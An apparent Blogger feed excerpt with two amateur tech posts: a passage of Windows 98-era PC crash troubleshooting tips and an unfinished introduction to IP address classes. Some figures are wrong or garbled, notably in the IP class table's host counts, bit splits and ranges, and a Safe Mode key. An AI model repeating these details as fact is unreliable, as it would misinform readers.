to mix the two types, as this can be a cause of trouble.&lt;br /&gt;&lt;br /&gt;EMM386 error messages refer to memory problems but may not be connected to bad Ram. This may be due to free memory problems often linked to old Dos-based programmes.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: #cc0000;"&gt;3 BIOS settings&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Every motherboard is supplied with a range of chipset settings that are decided in the factory. A common way to access these settings is to press the F2 or delete button during the first few seconds of a boot-up.&lt;br /&gt;&lt;br /&gt;Once inside the BIOS, great care should be taken. It is a good idea to write down on a piece of paper all the settings that appear on the screen. That way, if you change something and the computer becomes more unstable, you will know what settings to revert to.&lt;br /&gt;&lt;br /&gt;A common BIOS error concerns the CAS latency. This refers to the Ram. Older EDO (extended data out) Ram has a CAS latency of 3. Newer SDRam has a CAS latency of 2. Setting the wrong figure can cause the Ram to lock up and freeze the computer's display.&lt;br /&gt;&lt;br /&gt;Mcft Windows is better at allocating IRQ numbers than any BIOS. If possible set the IRQ numbers to Auto in the BIOS. This will allow Windows to allocate the IRQ numbers (make sure the BIOS setting for Plug and Play OS is switched to 'yes' to allow Windows to do this.).&lt;br /&gt;&lt;br /&gt;&lt;span style="color: #cc0000;"&gt;4 Hard disk drives&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;After a few weeks, the information on a hard disk drive starts to become piecemeal or fragmented. It is a good idea to defragment the hard disk every week or so, to prevent the disk from causing a screen freeze. Go to&lt;br /&gt;&lt;br /&gt;* Start&amp;gt;Programs&amp;gt;Accessories&amp;gt;System Tools&amp;gt;Disk Defragmenter&lt;br /&gt;&lt;br /&gt;This will start the procedure. You will be unable to write data to the hard drive (to save it) while the disk is defragmenting, so it is a good idea to schedule the procedure for a period of inactivity using the Task Scheduler.&lt;br /&gt;&lt;br /&gt;The Task Scheduler should be one of the small icons on the bottom right of the Windows opening page (the desktop).&lt;br /&gt;&lt;br /&gt;Some lockups and screen freezes caused by hard disk problems can be solved by reducing the read-ahead optimisation. This can be adjusted by going to&lt;br /&gt;&lt;br /&gt;* Start-Settings-Control Panel-System Icon-Performance-File System-Hard Disk.&lt;br /&gt;&lt;br /&gt;Hard disks will slow down and crash if they are too full. Do some housekeeping on your hard drive every few months and free some space on it. Open the Windows folder on the C drive and find the Temporary Internet Files folder. Deleting the contents (not the folder) can free a lot of space.&lt;br /&gt;&lt;br /&gt;Empty the Recycle Bin every week to free more space. Hard disk drives should be scanned every week for errors or bad sectors. Go to&lt;br /&gt;&lt;br /&gt;* Start&amp;gt;Programs&amp;gt;Accessories&amp;gt;System Tools&amp;gt;ScanDisk&lt;br /&gt;&lt;br /&gt;Otherwise assign the Task Scheduler to perform this operation at night when the computer is not in use.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: #cc0000;"&gt;5 Fatal OE exceptions and VXD errors&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Fatal OE exception errors and VXD errors are often caused by video card problems.&lt;br /&gt;&lt;br /&gt;These can often be resolved easily by reducing the resolution of the video display. Go to&lt;br /&gt;&lt;br /&gt;* Start-Settings&amp;gt;Control Panel&amp;gt;Display-Settings&lt;br /&gt;&lt;br /&gt;Here you should slide the screen area bar to the left. Take a look at the colour settings on the left of that window. For most desktops, high colour 16-bit depth is adequate.&lt;br /&gt;&lt;br /&gt;If the screen freezes or you experience system lockups it might be due to the video card. Make sure it does not have a hardware conflict. Go to&lt;br /&gt;&lt;br /&gt;* Start-Settings&amp;gt;Control Panel&amp;gt;System&amp;gt;Device Manager&lt;br /&gt;&lt;br /&gt;Here, select the + beside Display Adapter. A line of text describing your video card should appear. Select it (make it blue) and press properties. Then select Resources and select each line in the window. Look for a message that says No Conflicts.&lt;br /&gt;&lt;br /&gt;If you have video card hardware conflict, you will see it here. Be careful at this point and make a note of everything you do in case you make things worse.&lt;br /&gt;&lt;br /&gt;The way to resolve a hardware conflict is to uncheck the Use Automatic Settings box and hit the Change Settings button. You are searching for a setting that will display a No Conflicts message.&lt;br /&gt;&lt;br /&gt;Another useful way to resolve video problems is to go to.&lt;br /&gt;&lt;br /&gt;* Start-Settings&amp;gt;Control Panel&amp;gt;System&amp;gt;Performance-Graphics&lt;br /&gt;&lt;br /&gt;Here you should move the Hardware Acceleration slider to the left. As ever, the most common cause of problems relating to graphics cards is old or faulty drivers (a driver is a small piece of software used by a computer to communicate with a device).Look up your video card's manufacturer on the internet and search for the most recent drivers for it.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: #cc0000;"&gt;6 Viruses&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Often the first sign of a virus infection is instability. Some viruses erase the boot sector of a hard drive, making it impossible to start. This is why it is a good idea to create a Windows start-up disk. Go to&lt;br /&gt;&lt;br /&gt;* Start-Settings&amp;gt;Control Panel&amp;gt;Add/Remove Programs&lt;br /&gt;&lt;br /&gt;Here, look for the Start Up Disk tab. Virus protection requires constant vigilance.&lt;br /&gt;&lt;br /&gt;A virus scanner requires a list of virus signatures in order to be able to identify viruses. These signatures are stored in a DAT file. DAT files should be updated weekly from the website of your antivirus software manufacturer.&lt;br /&gt;&lt;br /&gt;An excellent antivirus programme is McAfee VirusScan by Network Associates ( www.nai.com). Another is Norton AntiVirus 2000, made by Symantec ( www.symantec.com).&lt;br /&gt;&lt;br /&gt;&lt;span style="color: #cc0000;"&gt;7 Printers&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;The action of sending a document to print creates a bigger file, often called a postscript file.&lt;br /&gt;&lt;br /&gt;Printers have only a small amount of memory, called a buffer. This can be easily overloaded. Printing a document also uses a considerable amount of CPU power. This will also slow down the computer's performance.&lt;br /&gt;&lt;br /&gt;If the printer is trying to print unusual characters, these might not be recognised, and can crash the computer. Sometimes printers will not recover from a crash because of confusion in the buffer. A good way to clear the buffer is to unplug the printer for ten seconds. Booting up from a powerless state, also called a cold boot, will restore the printer's default settings and you may be able to carry on.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: #cc0000;"&gt;8 Software&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;A common cause of computer crash is faulty or badly-installed software. Often the problem can be cured by uninstalling the software and then reinstalling it. Use Norton Uninstall or Uninstall Shield to remove an application from your system properly. This will also remove references to the programme in the System Registry and leaves the way clear for a completely fresh copy.&lt;br /&gt;&lt;br /&gt;The System Registry can be corrupted by old references to obsolete software that you thought was uninstalled. Use Reg Cleaner by Jouni Vuorio to clean up the System Registry and remove obsolete entries. It works on Windows 95, Windows 98, Windows 98 SE (Second Edition), Windows Millennium Edition (ME), NT4 and Windows 2000.&lt;br /&gt;&lt;br /&gt;Read the instructions and use it carefully so you don't do permanent damage to the Registry. If the Registry is damaged you will have to reinstall your operating system. Reg Cleaner can be obtained from www.jv16.org&lt;br /&gt;&lt;br /&gt;Open a Windows problem can be resolved by entering Safe Mode. This can be done during start-up. When you see the message "Starting Windows" press F4. This should take you into Safe Mode.&lt;br /&gt;&lt;br /&gt;Safe Mode loads a minimum of drivers. It allows you to find and fix problems that prevent Windows from loading properly.&lt;br /&gt;&lt;br /&gt;Sometimes installing Windows is difficult because of unsuitable BIOS settings. If you keep getting SUWIN error messages (Windows setup) during the Windows installation, then try entering the BIOS and disabling the CPU internal cache. Try to disable the Level 2 (L2) cache if that doesn't work.&lt;br /&gt;&lt;br /&gt;Remember to restore all the BIOS settings back to their former settings following installation.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: #cc0000;"&gt;9 Overheating/CPU Over Temperature Eror&amp;nbsp; &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Central processing units (CPUs) are usually equipped with fans to keep them cool. If the fan fails or if the CPU gets old it may start to overheat and generate a particular kind of error called a kernel error. This is a common problem in chips that have been overclocked to operate at higher speeds than they are supposed to.&lt;br /&gt;&lt;br /&gt;One remedy is to get a bigger better fan and install it on top of the CPU. Specialist cooling fans/heatsinks are available from www.computernerd.com or www.coolit.com&lt;br /&gt;&lt;br /&gt;CPU problems can often be fixed by disabling the CPU internal cache in the BIOS. This will make the machine run more slowly, but it should also be more stable.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: #cc0000;"&gt;10 Power supply problems&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;With all the new construction going on around the country the steady supply of electricity has become disrupted. A power surge or spike can crash a computer as easily as a power cut.&lt;br /&gt;&lt;br /&gt;If this has become a nuisance for you then consider buying a uninterrupted power supply (UPS). This will give you a clean power supply when there is electricity, and it will give you a few minutes to perform a controlled shutdown in case of a power cut.&lt;br /&gt;&lt;br /&gt;It is a good investment if your data are critical, because a power cut will cause any unsaved data to be lost.&lt;/b&gt;&lt;/span&gt;
&lt;style type="text/css"&gt;
.btnLogin{

    -moz-border-radius:2px;

    -webkit-border-radius:2px;

    border-radius:15px;

    background:#a1d8f0;

    background:-moz-linear-gradient(top, #badff3, #7acbed);

    background:-webkit-gradient(linear, center top, center bottom, from(#badff3), to(#7acbed));

    -ms-filter: "progid:DXImageTransform.Microsoft.gradient(startColorStr='#badff3', EndColorStr='#7acbed')";

    border:1px solid #7db0cc !important;

    cursor: pointer;

    padding:11px 16px;

    font:bold 11px/14px Verdana, Tahomma, Geneva;

    text-shadow:rgba(0,0,0,0.2) 0 1px 0px;

    color:#fff;

    -moz-box-shadow:inset rgba(255,255,255,0.6) 0 1px 1px, rgba(0,0,0,0.1) 0 1px 1px;

    -webkit-box-shadow:inset rgba(255,255,255,0.6) 0 1px 1px, rgba(0,0,0,0.1) 0 1px 1px;

    box-shadow:inset rgba(255,255,255,0.6) 0 1px 1px, rgba(0,0,0,0.1) 0 1px 1px;

    margin-center:12px;

    float:center;

    padding:7px 21px;

}


.btnLogin  : hover,

.btnLogin::focus,

.btnLogin : active{

    background:#a1d8f0;

    background:-moz-linear-gradient(top, #7acbed, #badff3);

    background:-webkit-gradient(linear, center top, center bottom, from(#7acbed), to(#badff3));

    -ms-filter: "progid:DXImageTransform.Microsoft.gradient(startColorStr='#7acbed', EndColorStr='#badff3')";

}

.btnLogin:active{

    text-shadow:rgba(0,0,0,0.3) 0 -1px 0px;

}
&lt;/style&gt;
&lt;!-- Start of Message Alert --&gt;
&lt;!-- Use this button in a form to pop-up a message when the user clicks it --&gt;
&lt;br /&gt;
&lt;center&gt;
&lt;form&gt;
&lt;input class="btnLogin" onclick="alert('Stay Connected with us and Get More Knowladge'); return true" type="button" value="Thanks For Reading" /&gt;
&lt;/form&gt;
&lt;/center&gt;
&lt;!-- End of Message Alert --&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://made-by-bangladesh.blogspot.com/feeds/3325980870208322146/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=921095381650575288&amp;postID=3325980870208322146&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/921095381650575288/posts/default/3325980870208322146?v=2'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/921095381650575288/posts/default/3325980870208322146?v=2'/><link rel='alternate' type='text/html' href='http://made-by-bangladesh.blogspot.com/2012/10/10-reasons-why-pcs-crash-u-must-know.html' title='10 reasons why PCs crash U must Know'/><author><name>Sajal Mondal</name><uri>https://plus.google.com/110516349656262710148</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh6.googleusercontent.com/-PWKcdujUFv8/AAAAAAAAAAI/AAAAAAAAASY/dzhIK6bFxxY/s512-c/photo.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/-OKp_Im1BSGc/UH2Q9QihXII/AAAAAAAAANE/QbyQGmGcCgA/s72-c/pc_crash.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry gd:etag='W/&quot;DkMARHkyfCp7ImA9WhNTE08.&quot;'><id>tag:blogger.com,1999:blog-921095381650575288.post-3375146004834888210</id><published>2012-10-15T23:52:00.003+06:00</published><updated>2012-10-16T00:07:25.794+06:00</updated><app:edited xmlns:app='http://www.w3.org/2007/app'>2012-10-16T00:07:25.794+06:00</app:edited><category scheme='http://www.blogger.com/atom/ns#' term='Internet'/><title>IP Address Structure Introduction !</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;Hello Visitor,&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&amp;nbsp; Today I'll Explain Introduction Of IP Address(&lt;/b&gt;&lt;/span&gt;&lt;span style="color: #38761d;"&gt;&lt;b&gt;Internet Protocol address).Every station on a PSN (packet switched network) that is based on the TCP/IP protocol (your computer is one, for example. Yes, we're referring to a host that is connected to the net) must have an IP address, so it can be identified,and information can be relayed and routed to it in an orderly fashion.An IP address consists of a 32 bit logical address. The address is divided&lt;br /&gt;into two fields:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #cc0000;"&gt;&lt;b&gt;1) The network address:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;Assigned by InterNIC (Internet Network Information Center).&lt;br /&gt;In fact most ISPs (internet service providers) purchase a number of addresses&lt;br /&gt;and assign them individually.&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #cc0000;"&gt;&lt;b&gt;2) The host address:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;An address that identifies the single nodes throughout the network. It can be assigned&lt;br /&gt;by the network manager, by using protocols for it such as DHCP, or the workstation itself.&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;a href="http://1.bp.blogspot.com/-XtSzfo55BCE/UHlHb1Cqd6I/AAAAAAAAALM/nNGIaH23i0Q/s1600/ip.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/-XtSzfo55BCE/UHlHb1Cqd6I/AAAAAAAAALM/nNGIaH23i0Q/s1600/ip.png" /&gt;&lt;/a&gt;&lt;span style="color: #38761d;"&gt;&lt;b&gt;The IP networking protocol is a logically routed protocol, meaning that address 192.43.54.2&lt;br /&gt;will be on the same physical wire as address 192.43.54.3 (of course this is not always true. It depends on the subnet mask of the network, but all of that can fill a text of its own)&lt;br /&gt;IP address structure:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: magenta;"&gt;&lt;b&gt;Every " --- " = 8 bits.&lt;br /&gt;The first bits ===&amp;gt; network address&lt;br /&gt;The last bits&amp;nbsp; ===&amp;gt; host address.&lt;br /&gt;with 8 bits you can present from 0-255 . (binary=(2 to the power of 8)-1)&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #cc0000;"&gt;&lt;b&gt;Example:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: magenta;"&gt;&lt;b&gt;11000010.01011010.00011111.01001010 (binary)&lt;br /&gt;194.90.31.74 (decimal)&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #cc0000;"&gt;&lt;b&gt;IP address CLASSES :&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;We can classify IP addreses to 5 groups. You can distinguish them by comparing the "High Order" bits (the first four bits on the&lt;br /&gt;left of the address):&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: magenta;"&gt;&lt;b&gt;type&amp;nbsp; | model&amp;nbsp; | target | MSB |addr.range&amp;nbsp;&amp;nbsp;&amp;nbsp; |bit number| max.stations|&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; | groups |&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |net./hosts|&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&lt;br /&gt;------|--------|--------|-----|--------------|----------|-------------|&lt;br /&gt;&amp;nbsp;A&amp;nbsp;&amp;nbsp; |N.h.h.h | ALL&amp;nbsp;&amp;nbsp;&amp;nbsp; |&amp;nbsp; 0&amp;nbsp; | 1.0.0.0&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&amp;nbsp;&amp;nbsp; 24/7&amp;nbsp;&amp;nbsp; | 16,777,214&amp;nbsp; |&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; | ACCEPT |&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&amp;nbsp;&amp;nbsp;&amp;nbsp; to&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; | HUGE&amp;nbsp;&amp;nbsp; |&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; | 127.0.0.0&amp;nbsp;&amp;nbsp;&amp;nbsp; |&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; | CORPS&amp;nbsp; |&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&lt;br /&gt;-----------------------------------------------------------------------&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |N.N.h.h | TO ALL | 10&amp;nbsp; | 128.1.00&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; | 16/14&amp;nbsp;&amp;nbsp;&amp;nbsp; | 65,543&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&lt;br /&gt;&amp;nbsp;B&amp;nbsp;&amp;nbsp; |&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; | LARGE&amp;nbsp; |&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&amp;nbsp;&amp;nbsp;&amp;nbsp; to&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; | CORPS&amp;nbsp; |&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; | 191.254.00&amp;nbsp;&amp;nbsp; |&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&lt;br /&gt;-----------------------------------------------------------------------&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |N.N.N.h |TO ALOT | 110 | 192.0.1.0&amp;nbsp;&amp;nbsp;&amp;nbsp; | 8/22&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&amp;nbsp; 254&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&lt;br /&gt;&amp;nbsp;C&amp;nbsp;&amp;nbsp; |&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |OF&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&amp;nbsp;&amp;nbsp;&amp;nbsp; to&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |SMALL&amp;nbsp;&amp;nbsp; |&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; | 223.225.254&amp;nbsp; |&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |CORPS&amp;nbsp;&amp;nbsp; |&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&lt;br /&gt;-----------------------------------------------------------------------&lt;br /&gt;D&amp;nbsp;&amp;nbsp;&amp;nbsp; | NONE&amp;nbsp;&amp;nbsp; |MULTI-CA|1110 | 224.0.0.0&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; | NOT FOR |&amp;nbsp;&amp;nbsp; UNKNOWN&amp;nbsp;&amp;nbsp; |&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |ST ADDR.|&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&amp;nbsp;&amp;nbsp;&amp;nbsp; to&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; | USUAL&amp;nbsp;&amp;nbsp; |&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |RFC-1112|&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |239.255.255.255| USE&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&lt;br /&gt;-----------------------------------------------------------------------&lt;br /&gt;E&amp;nbsp;&amp;nbsp;&amp;nbsp; | NOT FOR|EXPERIME|1,1,1,1| 240.0.0.0&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |NOT FOR|&amp;nbsp; NOT FOR USE|&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&amp;nbsp; USE&amp;nbsp;&amp;nbsp; |NTAL&amp;nbsp;&amp;nbsp;&amp;nbsp; |&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&amp;nbsp;&amp;nbsp; to&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |USE&amp;nbsp;&amp;nbsp;&amp;nbsp; |&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |ADDR.&amp;nbsp;&amp;nbsp; |&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |254.255.255.255|&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; |&lt;br /&gt;-----------------------------------------------------------------------&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #cc0000;"&gt;&lt;b&gt;N=NETWORK , h=HOST .&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: magenta;"&gt;&lt;b&gt;Notice the address range 127.X.X.X.&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;These addresses are assigned to internal use to the network device, and are&lt;br /&gt;used as an application tool only. For example: 127.0.0.1, the most common one,&lt;br /&gt;is called the loop-back address - everything sent here goes directly back to&lt;br /&gt;you, without even traveling out on the wire.&lt;br /&gt;Also, some IPs are reserved for VPNs - Virtual Private Networks. These are&lt;br /&gt;local area networks over wide area networks that use the Internet Protocol to&lt;br /&gt;communicate, and each computer inside the network is assigned with an IP&lt;br /&gt;address. So, suppose a certain computer wants to send a data packet to&lt;br /&gt;another host on the network with the IP 'x', but there's also another host on&lt;br /&gt;the Internet that has the same IP - what happens now? So this is why you&lt;br /&gt;cannot use these and other forms of reserved IPs on the Internet.&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
